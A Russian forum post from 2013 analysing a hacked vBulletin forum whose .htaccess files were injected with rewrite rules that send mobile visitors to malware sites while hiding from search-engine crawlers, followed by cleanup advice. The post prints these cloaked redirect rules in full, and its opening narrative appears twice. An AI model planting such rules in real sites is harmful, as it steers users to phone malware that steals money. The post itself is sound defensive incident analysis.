- 24, Jun 2013
- #1
Еще одна тема обзора уязвимостей, с которой столкнулся совсем недавно. Это взлом воблы и перенаправление трафика через .htaccess.
Первый признак, что с вашим форумом что-то не так - это исчезновение трафика с Яндекса. Чтобы кто ни говорил, а именно Яндекс реагирует самый первый, если ваш форум заболел. Итак, мы имеем пациента vBulletin 3.8.5 с установленным и пропатченным vbSEO. Форум хостится на шаред хостинге в Германии, и Яндекс обнаружил на форуме вредоносный код.
Интересный момент: Сегодня проверка Яндекса вредоносный код показывает, завтра видит форум чистым. И так несколько раз подряд. Что же на самом деле случилось с форумом, и почему он "угрожает безопасности вашего компьютера"? Именно такая надпись появляется, если просто забить URL в поисковую строку Яндекса. Беглый обзор файлов в файловой системе по последним изменениям не дал ничего интересного.
Все изменения были произведены достаточно давно: в феврале, а то еще и позже, но просмотр .htaccess в корневой папке показал, что туда злоумышленник прописал следующие строки:
При посещении вашего форума с компьютера не происходит абсолютно ничего.
Как только пользователь переходит с мобильного устройства, его с вашего форума перекидывает на те пару сайтов, что мы видим в коде выше.
Теперь немного отвлечемся и я вкратце расскажу зачем это кому-то нужно. Собственно сам ваш форум никому не нужен.
Злоумышленнику важен трафик вашего форума, и если он достаточно большой, и если ваш форум посещают часто с мобильных устройств, то для них это золотое дно.
Пользователь, зайдя на ваш форум со смартфона, вместо общения с вашими пользователями попадает на левый сайт, который предлагает, например обновить флэш плеер, или что-то еще.
После обновления у вас на мобильном устройстве появляется вирус, который списывает деньги со счета.
В одних случаях это немного, в других порядка 490 руб и выше.
490 руб это средняя планка. В некоторых случаях сам взлом происходит через уязвимости самого движка, хаков, модулей и тд. Как мы помним истории периодически потрясают Рунет.
Например, пациент мог быть вполне взломан во время той истории https://lumtu.com/uyazvimosti-vbulletin/2530-naidena-uyazvimost-vbseo.html
, и как выяснилось пропатчен форум был не до конца.
Но, существует и иной вариант. Многие форумы хостятся на шаред хостинге.
То есть получается что на одном сервере уютно живет множество сайтов.
200, 300 и более.
Все сайты разные, работают на самых разных движках, защищенных и нет, и если хостер не очень сильно заботится о безопасности, то через уязвимость на одном из них злоумышленник получает доступ к phpMyAdmin. Лично у меня были несколько случаев взлома сайтов через Директ Админ.
Как лечить?
Возможно сменить хостинг.
Первый признак, что с вашим форумом что-то не так - это исчезновение трафика с Яндекса. Чтобы кто ни говорил, а именно Яндекс реагирует самый первый, если ваш форум заболел. Итак, мы имеем пациента vBulletin 3.8.5 с установленным и пропатченным vbSEO. Форум хостится на шаред хостинге в Германии, и Яндекс обнаружил на форуме вредоносный код.
Интересный момент: Сегодня проверка Яндекса вредоносный код показывает, завтра видит форум чистым. И так несколько раз подряд. Что же на самом деле случилось с форумом, и почему он "угрожает безопасности вашего компьютера"? Именно такая надпись появляется, если просто забить URL в поисковую строку Яндекса. Беглый обзор файлов в файловой системе по последним изменениям не дал ничего интересного.
Все изменения были произведены достаточно давно: в феврале, а то еще и позже, но просмотр .htaccess в корневой папке показал, что туда злоумышленник прописал следующие строки:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://get.loadfilemobile.ru/?go&source=вашсайт.ru [L,R=302] # on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://uploads-xxx.ru/?8&source=вашсайт.ru [L,R=302] # OnПри посещении вашего форума с компьютера не происходит абсолютно ничего.
Как только пользователь переходит с мобильного устройства, его с вашего форума перекидывает на те пару сайтов, что мы видим в коде выше.
Теперь немного отвлечемся и я вкратце расскажу зачем это кому-то нужно. Собственно сам ваш форум никому не нужен.
Злоумышленнику важен трафик вашего форума, и если он достаточно большой, и если ваш форум посещают часто с мобильных устройств, то для них это золотое дно.
Пользователь, зайдя на ваш форум со смартфона, вместо общения с вашими пользователями попадает на левый сайт, который предлагает, например обновить флэш плеер, или что-то еще.
После обновления у вас на мобильном устройстве появляется вирус, который списывает деньги со счета.
В одних случаях это немного, в других порядка 490 руб и выше.
490 руб это средняя планка. В некоторых случаях сам взлом происходит через уязвимости самого движка, хаков, модулей и тд. Как мы помним истории периодически потрясают Рунет.
Например, пациент мог быть вполне взломан во время той истории https://lumtu.com/uyazvimosti-vbulletin/2530-naidena-uyazvimost-vbseo.html
, и как выяснилось пропатчен форум был не до конца.
Но, существует и иной вариант. Многие форумы хостятся на шаред хостинге.
То есть получается что на одном сервере уютно живет множество сайтов.
200, 300 и более.
Все сайты разные, работают на самых разных движках, защищенных и нет, и если хостер не очень сильно заботится о безопасности, то через уязвимость на одном из них злоумышленник получает доступ к phpMyAdmin. Лично у меня были несколько случаев взлома сайтов через Директ Админ.
Как лечить?
- Проверить наличие изменений в файловой системе по дате. Если изменения есть, но вы ничего не меняли, заменить файлы из дистрибутива.
- Проверить исходный код страницы форума на наличие сторонних скриптов, или непонятного кода.
- В данном случае проверить ВСЕ файлы .htaccess форума. Как правило они изменяются все.
- Выполнить все рекомендации темы: https://lumtu.com/uyazvimosti-vbulletin/2659-kak-zaschitit-forum-na-vbulletin.html
- Сменить пароли на FTF, пароли базы данных, пароли панели управления хостинга, админские пароли.
Возможно сменить хостинг.
![[Татьяна Элль] Мудра для эмоциональной уравновешенности](/assets/images/icons/forum4.png){kind=icon}
![[Анатолий Верчинский] Ложные друзья переводчика превращаются в помощников! Словарь-самоучитель для изучающих английский язык](/assets/images/icons/forum1.png){kind=icon}
